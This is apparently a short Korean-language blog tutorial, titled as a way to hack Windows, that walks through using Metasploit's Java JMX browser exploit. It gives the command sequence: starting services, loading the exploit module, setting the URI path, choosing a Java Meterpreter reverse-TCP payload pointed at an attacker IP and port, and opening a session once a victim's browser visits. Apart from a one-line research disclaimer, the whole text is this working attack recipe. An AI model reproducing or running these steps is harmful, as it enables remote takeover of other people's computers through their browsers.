Hack windows with metasploit Java Applet JMX Remote Code Execution

모든 책임은 사용자에게 있습니다. 연구 목적으로만 사용하시기 바랍니다.

먼저 하기전에 리눅스에서 

service apache2 start

service postgresql start

service metastploit start 명령어들을 실행 시켜준다.

그 후 msfconsole을 해준다. 

그럼 위와같은 창이 뜰것이다. (그림은 다를 수 있다.)

그 후 우리가 해야할 일은 핸들러를 만드는 일이다.

use exploit/multi/browser/java_jre17_jmxbean_2 명령어를 이용하여 핸들러를 만든다.

우리가 다음 해야 할 행동으로 show options 을 이용하여 우리가 정해줘야하는 것을 본다.

먼저 URIPATH 명령어를 이용하여 경로를 지정해준다. / 해도되고 test를 해도된다. 지정하지 않으면 랜덤값으로 만들어 준다.

다음으로는 payload를 설정하기위해 show payloads 명령어를 이용하여 payload 가 무엇이있는지 확인을 한다.

우리가 사용할 payload는 java/meterpreter/reverse_tcp 라는 payload 를 이용할 것이다. 

payload 또한 설정 했으니 다시 show options을 이용하여 다음 설정할 것을 보자 

set LHOST attacker IP 와 set LPORT 명령어를 이용하여 통신할 포트를 지정해준다.

다음은 exploit -j  명령어를 이용한다. 

그 후 victim PC에서 인터넷브라우저에서 공격자가 지정한 IP로 접속을 하게 된다면 

attacker PC에서는 victim 컴퓨터의 session 을 확인 할수있다.

그럼 session -i ID[session ID]를 입력하면 meterpreter가 가능하다.